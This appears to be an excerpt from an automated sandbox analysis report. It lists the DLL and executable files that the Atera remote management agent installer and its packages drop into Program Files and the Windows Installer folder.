                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cuninst.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\tools\7z.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\CredentialManagement.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.MemoryMappedFiles.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.TraceSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\RunScriptAsUser.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.Watcher.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Extensions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\x86\SQLite.Interop.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.EnvironmentVariables.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\LiteDB.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Tools.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\ru\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\AgentPackageADRemote.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Atera.Agent.Package.Infrastructure.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.StackTrace.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.NonGeneric.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Overlapped.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\CliWrap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Net.WebSockets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5085.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.UnmanagedMemoryStream.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Configuration.Binder.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\UserDetections.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSICA80.tmpJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Reflection.Primitives.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA8AC.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Xml.XPath.XDocument.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\choco.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.Debug.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Drawing.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Timer.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIAC76.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Text.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\RestartReminderNotification.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\StructureMap.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Collections.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\chocolatey.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\chocolatey.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4a.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\EO.WebBrowser.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\runtimes\win\lib\net6.0\System.Diagnostics.EventLog.Messages.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Threading.Tasks.Parallel.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.Primitives.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.Sinks.File.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.DriveInfo.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI56F2.tmp-\AlphaControlAgentInstallation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.Configuration.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Serilog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Agent.Package.Availability.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cpush.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Configuration.UserSecrets.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Hosting.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.EventLog.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2D79.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\ThirdPartyPackageManager.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\BouncyCastle.Crypto.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.FileProviders.Physical.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Diagnostics.DiagnosticSource.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Agent.Package.Watchdog.exeJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.Reader.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Resources.ResourceManager.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI2FBD.tmpJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageADRemote\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.ComponentModel.EventBasedAsync.dllJump to dropped file
                                Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: 692c4b.rbf (copy)Jump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\zh-CN\Microsoft.Win32.TaskScheduler.resources.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Newtonsoft.Json.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Buffers.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\System.Numerics.Vectors.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.ValueTuple.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\Microsoft.ApplicationInsights.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Diagnostics.Abstractions.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Availability\Microsoft.Extensions.Logging.Console.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.IO.FileSystem.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\System.Data.SQLite.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\SharpSnmpLib.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dllJump to dropped file
                                Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5885.tmp-\System.Management.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageRuntimeInstaller\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\System.Memory.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.DependencyInjection.dllJump to dropped file
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeDropped PE file which has not been started: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\redirects\cinst.exeJump to dropped file
